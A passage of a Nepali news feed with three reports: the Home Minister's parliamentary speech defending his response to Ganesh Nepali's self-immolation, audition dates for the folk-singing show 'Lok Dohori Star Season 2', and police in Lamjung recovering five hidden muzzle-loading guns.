‘सम्माननीय…’ भनेर थप अघि बढ्न सक्नु भएन । बोल्न नसकेपछि गृहमन्त्री प्रतिनिधि सभा बैठकको हलबाट बाहिरिनु भयो । हल छाडेर बाहिर गएपछि कानुन मन्त्री सोबिता गौतमले उहाँलाई फिर्ता बोलाउनु भएको थियो ।
गृहमन्त्रीले भन्नुभयो, ‘आज म यहाँ बोल्न आएको । मैले धेरै साथीभाइ देखेँ, माननीय ज्यूहरू उठेर घाँटी सुक्ने गरी चिच्चाई राख्नुभएको थियो, मैले देखेँ, यहाँ त्यस्तो भन्दै गर्दा हामी गृह मन्त्रालयमा बसेर के गर्ने होला ? कसरी गर्ने होला ? कसरी उहाँहरूलाई सान्त्वना दिने होला ? के–के गर्ने ? कसरी मिलाउने होला ? भनेर सोच्ने एउटा टिम बनाएर छलफल गरिरहेका थियौं ।’
सांसदहरूलाई गृहमन्त्री सुधनले ‘कराएर जनताको सेवा नहुने’ जवाफ फर्काउनु भएको थियो । उहाँले संसद्मा प्रश्न गर्ने सांसदलाई प्रतिप्रश्न गर्दै भन्नुभयो, ‘म यो सम्मानित सदनलाई सभामुख मार्फत सोध्न चाहन्छु, कति जना हुनुहुन्थ्यो हिजो त्यो हस्पिटलमा ? तपाईंहरू जति जनालाई घाँटी चिच्याएर कराउनु भइरहेको छ यहाँ । ?’ गृहमन्त्रीले थप भन्नुभयो, ‘यहाँ सदनमा चिच्याएर कराएर मात्र हुँदैन । म जनताको सेवा गर्छु भनेर मुखले बोलेर हुँदैन’ उनले पूराना दलहरूप्रति कटाक्ष गरे, ‘त्यो मुखले बोलेको ५० औं वर्ष भइसक्यो । हामीले हातले गर्नु पर्छ । आफ्नो जनताको सेवा ठाउँमा गएर गर्नु पर्छ । उहाँहरूको पीडाको ठाउँमा बुझेर गर्नुपर्छ ।’
राष्ट्रिय प्रजातन्त्र पार्टीका संसदीय दलका नेता ज्ञानेन्द्र शाहीले गृहमन्त्री गुरुङ गणेश नेपालीलाई बचाउने सन्दर्भमा गृहमन्त्री गुरुङ गम्भीर नभएको टिप्पणी गर्नु भएको थियो । शाहीले भन्नुभयो, ‘गृहमन्त्रीज्यूलाई भन्न चाहन्छु तपाईं गृहमन्त्री हो कि कन्टेन्ट क्रिएटर हो ? गृहमन्त्रीले फ्लिमको नायक जस्तै मिडिया घेरेर, चलचित्रको नायक जस्तै कहिले एयरपोर्ट, कहिले कता, कहिले उता दौडिरहनुभएको थियो पुरै क्यामेरा बोकेर ।’ गणेश नेपालीको साँच्चै उपचार गर्ने सरकारको उद्देश्य थियो भन्ने प्रश्न समेत शाहीको थियो ।
गृहमन्त्री सुधनले गणेश नेपालीलाई बचाउन रातभर खटेको स्मरण गर्दै भन्नुभयो, ‘त्यसलाई तपाईंहरू स्टन्टबाजी भनेर भन्नुहुन्छ । मलाई इच्छा छैन यहाँ कसैको लागि स्टन्टबाजी गर्न । म आफ्नो देशको सेवा गर्न आएको हो, जानी नजानी अन्जानमा होस् । आफूले सक्ने नसक्ने गरेर हातमा पानी राखेर बिस्तारै हिँड्दै हिँड्दै यहाँसम्म आएको हो, पोखिएलाकी देश दुर्घटनामा जालाकी भनेर । त्यसलाई तपाईंले स्टन्ट बाजी भनेर भन्नुहुन्छ ?’ गृहमन्त्रीले थप भन्नुभयो, ‘एउटा मन्त्रीको हैसियतले एउटा नागरिकको लागि हामी हिजो रातभरि खट्यौं । मेरो यत्तिकै यो आँसु झरेको छैन । किनभने आफूले अथाक प्रयास गर्दा गर्दा पनि नहुँदाखेरी त्यो चित्तै नबुझ्ने रहेछ ।’
गृहमन्त्रीका अनुसार गणेश नेपालीलाई बचाउन राज्यका सबै संयन्त्र लागेका थिए । गणेश नेपालीलाई एयरपोर्टसम्म सेफ ट्रान्सफर गर्न रातभर नेपाल प्रहरी, ट्राफिक प्रहरी बाटोभरी उभिएर बसे ।
गृहमन्त्री अस्पताल पुग्नु भयो । सबै स्पेसलिस्ट डाक्टरहरू बोलाए । पैसाको टेन्सन नलिएर उपचारमा मात्रै सोच्न सुझाए । भारत लैजानका लागि तयारी गरेर समन्वय गर्नुभएका गृहमन्त्री सुधनले भारत लैजाने तयारी भएको प्रष्ट्याउनु भयो । आफ्नो यस्तो खटाइलाई स्टन्टबाजी भनिएकोमा गृहमन्त्री सुधनले चित्त समेत दुखाउनु भयो । संसदीय ममर्यादाको स्मरण गराउँदै महानगरप्रति लक्षित :
यसैबीच, गणेश नेपालीको आत्मदाहको सन्दर्भमा सांसदहरूले जे जति सन्दर्भ जोडेर प्रश्न उठाए ती तीन तहको सरकारसँग सम्बन्धित रहेको गृहमन्त्री गुरुङले स्थानीय र प्रदेश सरकारको जिम्मेवारी देखाउनु भयो । उहाँले भन्नुभयो, ‘अब आज म यो सम्मानित सदनमा तपाईंहरूलाई सरकार कसरी सञ्चालन हुन्छ ? म सिकाउन चाहन्छु । हाम्रो तीन तहको सरकार हुन्छ । एउटा संघीय सरकार भयो । एउटा प्रदेश सरकार भयो । र एउटा स्थानीय सरकार भयो ।’
त्यो घट्नामा संघीय सरकार कति जिम्मेवार थियो भन्ने प्रश्न गर्दै भन्नुभयो, ‘जुन ठाउँमा घटना घट्यो । त्यो ठाउँमा ट्राफिकले ह्विल लक गरेको हैन, ट्राफिकले ह्वील लक गरेको हैन । कुनै भिडियो मा छ ट्राफिकले लगाएको त्यसमा ?’ गृहमन्त्री गुरुङले भने, ‘नगर प्रहरीले ह्वील लक लगाएको छ ।’
उहाँले विपक्षी दलका सांसदहरूले जानीजानी प्रश्न गरेको भनेर संसदीय मर्यादाको प्रश्न पनि उठाउनु भयो ।
गृहमन्त्री गुरुङले ट्राफिक जरिवाना कति लिने भनेर कसले नियम बनाएको भनेर प्रश्नकर्ता सांसदहरूलाई नै सोधे, ‘यो नियम÷कानुन (ट्राफिक उल्लंघन सम्बन्धी नियम÷कानुन) कसले बनाएको ? कालो सिसा लगायो । त्यो कालो सिसा लगाउन नपाउने नियम हामीले कोरेका थियौ ? तपाईंहरुले बनाएको नियम हामीले पालना मात्र गराएको हो’ उहाँको प्रतिप्रश्न थियो ।
उहाँले थप भन्नुभयो, ‘कति कुराहरू तपाईंहरूले जानेर अबुझ गर्नुभएको छ । धेरै भयो मैले सहेको, यो सम्मानीत सदनलाई एउटा रेस्पेक्टेड भिउ पोइन्टबाट हेर्नु पर्छ, यसमा बोल्दा एकदम मर्यादा राखेर बोल्नु पर्छ भनेर आएको । तर घुटकन भैसक्यो ।’
देश राम्रो होला भनेर लडेर आएर सरकारमा रहेर काम गर्दै गर्दा विपक्षी दलबाट भएको व्यवहारबाट कहिलेकाहीँ गाह्रो भएको उहाँले उल्लेख गर्नु भयो । विपक्षीप्रति रोष व्यक्त गर्दै भन्न्ुभयो, ‘हामीहरू सबै युवाहरू एउटा आशाले लडेका थियौं । आज आएर विपक्षी दलका जतिजना मित्रहरू हुनुहुन्छ, जतिजना राजनीतिज्ञहरू हुनुहुन्छ, देश चलाएर ५० औं वर्ष राज गरेका माननीय ज्यूहरूबाट हामीले सिक्नु पर्नेमा आज हामीले यो स्थिति देख्न पाइरहेका छौं ।’
गृहमन्त्रीले विपक्षीका सांसदहरूले व्यक्तिगत भेट्दा राम्रो गरेको भन्ने तर संसद्मा अर्कै तरिकाले प्रश्न गर्ने गरेको भन्दै गृहमन्त्रीले यस्तो दोहोरो नीति नअपनाउन विपक्षी दलहरूलाई सुझाउनु भएको छ । गुरुङले भन्नुभयो, ‘त्यो पर्दा पछाडिको खेल हामीलाई मन पर्दैन ।’
]]>https://www.antaranganews.com/?feed=rss2&p=499590‘लोक दोहोरी स्टार सिजन– २’को पहिलो एडिसन आजबाट सुरू हुने
https://www.antaranganews.com/?p=49956
https://www.antaranganews.com/?p=49956#respondSat, 11 Jul 2026 01:59:39 +0000https://www.antaranganews.com/?p=49956काठमाडौं– नेपाली लोक संगीतको टेलिभिजन रियालिटी शो ‘लोक दोहोरी स्टार सिजन–२’ को देशव्यापी अडिसन आजबाट सुरु हुने भएको छ । पहिलो अडिसन कार्यक्रमको सुरुवात आज असार २७ गते इटहरीबाट हुने भएको हो । इटहरीको क्लब केमा उक्त कार्यक्रम हुने आयोजकको भनाइ छ । सो प्रतियोगिता पनि एभेन्टोज स्टुडियोको आयोजनामा हुन लागेको हो ।
एभेन्टोज स्टुडियोको आयोजनामा हुन लागेको शोको अडिसन सातै प्रदेशमा हुनेछ । नयाँ पुस्ताका प्रतिभावान गायक–गायिकालाई राष्ट्रिय मञ्च प्रदान गर्ने उद्देश्यका साथ यो प्रतियोगिताको आयोजना गरिएको हो । प्रतियोगितामा सहभागी हुन कम्तीमा १६ वर्ष उमेर पुगेका नेपाली नागरिक हुनुपर्नेछ । महिला तथा पुरुष दुवैका लागि प्रतियोगिता खुला रहनेछ । यो शोका लागि देशका विभिन्न जिल्लामा रहेका मौलिक लोक प्रतिभालाई राष्ट्रियस्तरको अवसर उपलब्ध गराउने उद्देश्यले यसपटक सातै प्रदेशलाई समेट्ने गरी अडिसन अभियान सञ्चालन गर्न लागिएको आयोजकको भनाइ छ । उनीहरूका अनुसार नेपाली लोक संगीतको क्षेत्रमा नयाँ पुस्ताका प्रतिभावान गायक–गायिकालाई राष्ट्रिय मञ्च प्रदान गर्ने उद्देश्यका साथ आयोजना गरिने भएको हो ।
नेपाली लोक सङ्गीतप्रति रुचि र समर्पण भएका, परम्परागत लोक भाका तथा शैलीको राम्रो ज्ञान भएका, स्पष्ट उच्चारणसहित भावपूर्ण प्रस्तुति दिन सक्ने तथा प्रश्न– उत्तर शैलीमा तत्काल दोहोरी सिर्जना गरेर प्रस्तुत गर्न सक्ने प्रतिभालाई प्राथमिकता दिइने विज्ञप्तिमा भनिएको छ ।
आयोजकका अनुसार असार २९ गते चितवन, असार ३१ गते बुटवल, साउन १ गते नेपालगञ्ज, ४ गते पोखरा तथा ८ र ९ गते काठमाडौंमा अडिसन सञ्चालन गरिनेछ । आयोजकका अनुसार पहिलो संस्करणको सफलतासँगै दोस्रो संस्करणलाई अझ व्यवस्थित, भव्य र प्रतिस्पर्धात्मक बनाउने तयारी गरिएको छ ।
चितवनको चितवन गार्डेन रिसोर्ट, बुटवलको ग्रीन भ्याली रेस्टुरेन्ट, नेपालगञ्जको होटल बाटिका, पोखराको साइमन पार्टी प्यालेस तथा काठमाडौंको न्युजा पार्टी भेन्यु एन्ड रेस्टुरेन्टलाई अडिसन स्थलका रूपमा चयन गरिएको आयोजकको भनाइ छ ।
माधवराज खरेलको निर्देशन रहने यो प्रतियोगिता एपीवान एचडी टेलिभिजनबाट प्रसारण हुने विज्ञप्तिमा उल्लेख छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=499560भोर्लेटारको काँडेपानी सार्वजनिक जंगलबाट एकनाले भरुवा बन्दुकका पाँच थान बरामद
https://www.antaranganews.com/?p=49948
https://www.antaranganews.com/?p=49948#respondFri, 10 Jul 2026 14:35:24 +0000https://www.antaranganews.com/?p=49948भोर्लेटार(लमजुङ)– लमजुङमा प्रहरीले बेवारिसे अवस्थामा जंगलबीच लुकाई राखिएका एकनाले भरुवा बन्दुकका पाँच थान बरामद गरेको छ । लमजुङको मध्यनेपाल नगरपालिका– ६ को भोर्लेटार नजिकै रहेको काँडेपानी सार्वजनिक जंगलबाट ती भरुवा बन्दुक बरामद गरेको जिल्ला प्रहरी कार्यालयले असार २६ गते जनाएको हो ।
लमजुङको मध्यनेपाल नगरपालिका– ६ भोर्लेटार नजिकै रहेको लामासोती पाखाको काँडेपानी सार्वजनिक जंगलबाट प्रहरीले बेवारिसे अवस्थामा पाँच थान एकनाले भरुवा बन्दुक बरामद गरेको प्रहरी भनाइ छ । ती बन्दुक इलाका प्रहरी कार्यालय भोर्लेटारबाट खटिएको प्रहरी टोलीले नियमित गस्तीका क्रममा जंगल क्षेत्रमा लुकाइछिपाइ राखिएको अवस्थामा ती बन्दुक २५ गते साँझ फेला पारेको जिल्ला प्रहरी कार्यालय लमजुङका प्रमुख प्रहरी नायव उपरीक्षक जितेन्द्रकुमार बस्नेतले बताउनु भयो । उहाँका अनुसार बरामद गरिएका सबै बन्दुक हाल इलाका प्रहरी कार्यालय भोर्लेटारको नियन्त्रणमा राखिएको छ । उहाँले भन्नुभयो, ‘ती बन्दुकहरू कसले, किन र कुन उद्देश्य प्राप्तिका लागि त्यो स्थानमा लुकाएर राखेको हो ? भन्ने विषयमा अनुसन्धान भइरहेको छ ।’
घटनामा संलग्न व्यक्तिको पहिचान भएपछि हातहतियार तथा खरखजाना सम्बन्धी कसुरअन्तर्गत कानुनी कारबाही अघि बढाइने जिल्ला प्रहरी कार्यालय लमजुङले जनाएको छ । त्यस बारेमा थप अनुसन्धान जारी रहेको प्रहरीले जनाएको छ ।
ती बन्दूकको हालको प्रचलित मूल्य के कति होला ? भन्दै राखिएको जिज्ञासामा जिल्ला प्रहरी कार्यालय लमजुङका सूचना अधिकारीले मूल्य थाहा नहुने बताउनु भयो । बन्दूकको मूल्य नै थाहा नभए पनि त्यसको विगो के कति कायम गरी मुद्दा चलाइएको हो त्यो भने कौतुहलको विषय बनेको छ ।
यसैबीच, जिल्ला प्रशासन कार्यालयमा रहेको हातहतियारको तथ्यांक पनि चुस्त हुन नसकेको स्रोतले जनाएको छ । कुनै बन्दुक एक व्यक्तिबाट अर्को व्यक्तिले खरिद गर्दा पनि फायल भने दुवै बन्दुकको रहने गरेको छ । एक व्यक्तिबाट अर्को व्यक्तिको नाउँमा सरेको बन्दूकको एकिन तथ्यांक दुरुस्त गर्न सकिएको स्थिति छैन सो कार्यालयका एक अधिकृतले बताए ।